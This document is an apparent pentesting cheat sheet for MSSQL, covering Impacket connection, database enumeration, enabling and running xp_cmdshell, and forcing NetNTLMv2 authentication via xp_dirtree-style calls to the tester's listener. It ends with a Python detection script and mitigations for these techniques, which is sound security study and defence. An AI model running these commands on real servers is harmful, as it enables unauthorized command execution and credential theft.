MSSQL.md

File metadata and controls

95 lines (73 loc) · 1.52 KB

MSSQL - <% tp.frontmatter.current_port %>

Using some Impacket tools

Connecting

(On Kali the script is packaged as impacket-mssqlclient)

mssqlclient.py <user>@<% tp.frontmatter.target_ip %> -windows-auth

Database enumeration

Once connected:

select name from sys.databases
EXEC sp_databases
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
SELECT name FROM master.sys.databases

Switch DBs and list the user tables in the selected one

use <db>
SELECT name FROM sysobjects WHERE xtype = 'U'

Show all tables of a given DB

SELECT * FROM <db_NAME>.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'

Code execution

You won't always have the permissions for this, but it is worth trying

EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE

Example of code execution (if the commands above succeeded)

EXEC xp_cmdshell 'whoami'

Capturing a NetNTLMv2 hash

Capture hash

On your machine, start a listener with either of the following (on Kali the Impacket script is packaged as impacket-smbserver)

sudo smbserver.py share ./ -smb2support
sudo responder -I tun0

Send the Hash

A few different ways to make the server authenticate to your listener (run these from the MSSQL session)

xp_dirtree '\\<% tp.frontmatter.my_ip %>\pwn'
exec master.dbo.xp_dirtree '\\<% tp.frontmatter.my_ip %>\pwn'
EXEC master..xp_subdirs '\\<% tp.frontmatter.my_ip %>\pwn'
EXEC master..xp_fileexist '\\<% tp.frontmatter.my_ip %>\pwn'
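From the defender's side, the two techniques in this note (enabling xp_cmdshell, and forcing an outbound SMB authentication through xp_dirtree / xp_subdirs / xp_fileexist) leave distinctive statements in a SQL Server statement log. The following is an added detection example, not part of the original note or of Impacket; it assumes a constructed, simplified pipe-separated export of captured T-SQL statements (timestamp|login|client_ip|statement), a hypothetical allowlist TRUSTED_UNC_HOSTS of file servers the instance legitimately talks to, and a real SQL Server Audit or Extended Events export would need its own parse_line().

```python
"""Flag xp_cmdshell enablement and UNC-path authentication triggers in a
SQL Server statement log (added detection example, not from the note)."""
import re
from dataclasses import dataclass

# Constructed sample log: timestamp|login|client_ip|statement.
# Raw string so the UNC backslashes survive as written.
SAMPLE_LOG = r"""
2024-05-01T10:00:01Z|sa|10.10.10.5|SELECT name FROM sys.databases
2024-05-01T10:00:07Z|sa|10.10.10.5|EXEC sp_configure 'xp_cmdshell', '1'
2024-05-01T10:00:08Z|sa|10.10.10.5|RECONFIGURE
2024-05-01T10:00:12Z|sa|10.10.10.5|EXEC xp_cmdshell 'whoami'
2024-05-01T10:01:30Z|reportuser|10.10.10.5|EXEC master..xp_dirtree '\\fileserver01\reports'
2024-05-01T10:02:04Z|reportuser|10.10.10.5|EXEC master..xp_fileexist '\\10.10.14.5\pwn'
""".strip()

# Assumed allowlist: hosts this instance is expected to reach over UNC paths.
TRUSTED_UNC_HOSTS = {"fileserver01"}

# sp_configure 'xp_cmdshell', 1  or  'xp_cmdshell', '1'
ENABLE_CMDSHELL = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*'?1'?", re.I)
RUN_CMDSHELL = re.compile(r"\bxp_cmdshell\b", re.I)
# Extended procedures that open a UNC path and therefore authenticate outbound.
UNC_PROCS = re.compile(r"\bxp_(?:dirtree|subdirs|fileexist)\b", re.I)
# \\host\share... -> capture "host"
UNC_HOST = re.compile(r"\\\\([^\\'\s]+)\\")


@dataclass
class Finding:
    time: str
    login: str
    rule: str
    detail: str


def parse_line(line):
    """Split one constructed log line into (time, login, client_ip, statement)."""
    time, login, client, stmt = line.split("|", 3)
    return time, login, client, stmt


def analyze(log_text, trusted_hosts=TRUSTED_UNC_HOSTS):
    """Return a Finding per suspicious statement, in log order."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        time, login, _client, stmt = parse_line(line)
        if ENABLE_CMDSHELL.search(stmt):
            findings.append(Finding(time, login, "xp_cmdshell_enabled", stmt))
        elif RUN_CMDSHELL.search(stmt):
            findings.append(Finding(time, login, "os_command_execution", stmt))
        elif UNC_PROCS.search(stmt):
            m = UNC_HOST.search(stmt)
            host = m.group(1) if m else "?"
            # A UNC call to an unknown host is the NetNTLMv2-capture pattern.
            if host.lower() not in {h.lower() for h in trusted_hosts}:
                findings.append(Finding(time, login, "unc_auth_to_untrusted_host", host))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f.time} {f.login:<12} {f.rule:<28} {f.detail}")
```

On the sample above this reports the xp_cmdshell enablement, the command execution, and the xp_fileexist call to 10.10.14.5, while the xp_dirtree call to the allowlisted file server is ignored. Keeping xp_cmdshell disabled and alerting on sp_configure changes, plus egress filtering of SMB (TCP 445) from database servers, are the usual mitigations for the two patterns.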